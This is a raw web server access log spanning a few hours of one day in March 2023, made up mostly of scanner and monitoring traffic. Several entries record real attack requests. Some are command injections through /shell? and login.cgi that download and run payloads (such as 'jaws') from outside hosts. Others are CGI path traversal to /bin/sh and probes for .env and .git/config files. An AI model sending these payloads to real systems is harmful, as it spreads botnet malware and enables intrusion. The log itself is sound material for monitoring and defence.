143.244.50.172 - - [06/Mar/2023:04:30:10 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
103.167.196.58 - - [06/Mar/2023:04:32:47 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos.fun/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
184.105.139.67 - - [06/Mar/2023:04:34:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0"
143.244.50.172 - - [06/Mar/2023:04:36:20 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
184.105.139.67 - - [06/Mar/2023:04:36:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
143.244.50.172 - - [06/Mar/2023:04:38:38 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
184.105.139.67 - - [06/Mar/2023:04:38:41 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0"
87.236.176.25 - - [06/Mar/2023:04:38:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
143.244.50.172 - - [06/Mar/2023:04:42:54 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
143.244.50.172 - - [06/Mar/2023:04:43:55 +0100] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 400 333 "-" "-"
143.244.50.172 - - [06/Mar/2023:04:50:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
67.205.142.69 - - [06/Mar/2023:04:50:36 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:50:37 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:50:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:50:37 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
143.244.50.172 - - [06/Mar/2023:04:50:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.106.29.122 - - [06/Mar/2023:04:52:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
143.244.50.172 - - [06/Mar/2023:04:55:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
35.81.163.135 - - [06/Mar/2023:04:55:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
67.205.142.69 - - [06/Mar/2023:04:56:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:56:31 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:56:31 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:04:56:31 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
195.154.200.118 - - [06/Mar/2023:04:57:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
143.244.50.172 - - [06/Mar/2023:04:59:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
149.129.50.37 - - [06/Mar/2023:04:59:22 +0100] "GET http://www.1ucn.com/proxychecker/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; IOpener Release 1.1.04)"
92.118.39.82 - - [06/Mar/2023:05:00:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.82 - - [06/Mar/2023:05:00:05 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
143.244.50.172 - - [06/Mar/2023:05:02:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
194.163.188.175 - - [06/Mar/2023:05:03:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
143.244.50.172 - - [06/Mar/2023:05:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:05:06:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:05:08:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
143.244.50.172 - - [06/Mar/2023:05:11:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
18.170.53.232 - - [06/Mar/2023:05:12:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:12:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
52.53.226.109 - - [06/Mar/2023:05:12:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
18.170.53.232 - - [06/Mar/2023:05:13:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
64.227.146.241 - - [06/Mar/2023:05:14:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
67.205.142.69 - - [06/Mar/2023:05:14:48 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:05:14:48 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:05:14:48 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
67.205.142.69 - - [06/Mar/2023:05:14:48 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
18.170.53.232 - - [06/Mar/2023:05:15:07 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:15:49 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:16:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
35.80.29.168 - - [06/Mar/2023:05:17:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
18.170.53.232 - - [06/Mar/2023:05:17:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
143.244.50.172 - - [06/Mar/2023:05:17:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.118.53.194 - - [06/Mar/2023:05:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
18.170.53.232 - - [06/Mar/2023:05:18:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
60.225.64.129 - - [06/Mar/2023:05:18:51 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
18.170.53.232 - - [06/Mar/2023:05:19:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:19:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:20:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:05:22:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
193.32.162.159 - - [06/Mar/2023:05:22:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.81.78.233 - - [06/Mar/2023:05:24:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
161.35.156.237 - - [06/Mar/2023:05:26:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.156.237 - - [06/Mar/2023:05:26:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.156.237 - - [06/Mar/2023:05:26:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
161.35.156.237 - - [06/Mar/2023:05:26:14 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
184.105.247.252 - - [06/Mar/2023:05:28:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
184.105.247.252 - - [06/Mar/2023:05:29:34 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
193.106.29.122 - - [06/Mar/2023:05:29:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
194.163.188.175 - - [06/Mar/2023:05:31:03 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
184.105.247.252 - - [06/Mar/2023:05:31:33 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
60.225.64.129 - - [06/Mar/2023:05:32:31 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.34.183.162 - - [06/Mar/2023:05:33:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
109.237.98.226 - - [06/Mar/2023:05:34:08 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.98.226 - - [06/Mar/2023:05:34:08 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
193.106.29.122 - - [06/Mar/2023:05:35:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
128.14.209.162 - - [06/Mar/2023:05:36:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
187.110.208.54 - - [06/Mar/2023:05:38:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.106.29.122 - - [06/Mar/2023:05:41:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
193.106.29.122 - - [06/Mar/2023:05:41:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
18.170.53.232 - - [06/Mar/2023:05:44:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.170.53.232 - - [06/Mar/2023:05:46:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
54.174.22.232 - - [06/Mar/2023:05:48:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3054.57 Safari/537.32"
193.32.162.159 - - [06/Mar/2023:05:48:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [06/Mar/2023:05:51:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.170.53.232 - - [06/Mar/2023:05:52:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.32.162.159 - - [06/Mar/2023:05:54:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.170.53.232 - - [06/Mar/2023:05:54:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.170.53.232 - - [06/Mar/2023:05:57:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
103.178.229.118 - - [06/Mar/2023:05:57:42 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+botbet.catbbos.fun/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
18.170.53.232 - - [06/Mar/2023:05:59:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.170.53.232 - - [06/Mar/2023:05:59:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.170.53.232 - - [06/Mar/2023:06:01:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.170.53.232 - - [06/Mar/2023:06:02:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.122 - - [06/Mar/2023:06:02:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
3.17.9.104 - - [06/Mar/2023:06:03:41 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:42 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:42 +0100] "GET /prod/.git/config HTTP/1.1" 404 321 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:42 +0100] "GET /admin/.git/config HTTP/1.1" 404 322 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:42 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:42 +0100] "GET /application/.git/config HTTP/1.1" 404 328 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:43 +0100] "GET /vendor/.git/config HTTP/1.1" 404 323 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:43 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:43 +0100] "GET /views/.git/config HTTP/1.1" 404 322 "-" "python-requests/2.28.2"
18.170.53.232 - - [06/Mar/2023:06:03:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.17.9.104 - - [06/Mar/2023:06:03:43 +0100] "GET /resources/.git/config HTTP/1.1" 404 326 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:44 +0100] "GET /system/.git/config HTTP/1.1" 404 323 "-" "python-requests/2.28.2"
3.17.9.104 - - [06/Mar/2023:06:03:44 +0100] "GET /src/.git/config HTTP/1.1" 404 320 "-" "python-requests/2.28.2"
18.170.53.232 - - [06/Mar/2023:06:05:57 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:06:05:58 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
194.163.188.175 - - [06/Mar/2023:06:07:39 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
18.170.53.232 - - [06/Mar/2023:06:10:59 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.170.53.232 - - [06/Mar/2023:06:12:44 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
193.32.162.159 - - [06/Mar/2023:06:13:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.170.53.232 - - [06/Mar/2023:06:13:30 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
193.32.162.159 - - [06/Mar/2023:06:13:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.106.29.122 - - [06/Mar/2023:06:13:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
60.225.64.129 - - [06/Mar/2023:06:19:21 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.32.162.159 - - [06/Mar/2023:06:19:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
128.14.134.170 - - [06/Mar/2023:06:21:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.32.162.159 - - [06/Mar/2023:06:22:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.163.188.175 - - [06/Mar/2023:06:30:20 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
170.64.142.63 - - [06/Mar/2023:06:31:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.142.63 - - [06/Mar/2023:06:31:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.142.63 - - [06/Mar/2023:06:31:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.142.63 - - [06/Mar/2023:06:31:18 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.142.63 - - [06/Mar/2023:06:36:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.142.63 - - [06/Mar/2023:06:36:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.142.63 - - [06/Mar/2023:06:36:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.142.63 - - [06/Mar/2023:06:36:34 +0100] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
39.104.17.164 - - [06/Mar/2023:06:39:45 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.215.81.11/jaws;chmod+/tmp/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
159.223.154.6 - - [06/Mar/2023:06:44:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
193.106.29.122 - - [06/Mar/2023:06:45:25 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
167.94.145.57 - - [06/Mar/2023:06:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.57 - - [06/Mar/2023:06:49:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.57 - - [06/Mar/2023:06:49:53 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.57 - - [06/Mar/2023:06:49:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.32.162.159 - - [06/Mar/2023:06:54:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
106.75.133.48 - - [06/Mar/2023:06:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
106.75.133.48 - - [06/Mar/2023:06:56:24 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [06/Mar/2023:07:00:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:01:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:02:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:03:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:04:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.145.9.196 - - [06/Mar/2023:07:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
143.244.50.172 - - [06/Mar/2023:07:04:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:05:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:05:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:06:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.163.188.175 - - [06/Mar/2023:07:06:23 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Mar/2023:07:07:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:08:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.244.50.172 - - [06/Mar/2023:07:08:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Mar/2023:07:09:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:10:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.118 - - [06/Mar/2023:07:10:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.118 - - [06/Mar/2023:07:10:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.118 - - [06/Mar/2023:07:10:10 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.118 - - [06/Mar/2023:07:10:10 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
193.32.162.159 - - [06/Mar/2023:07:10:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [06/Mar/2023:07:11:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2023:07:12:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
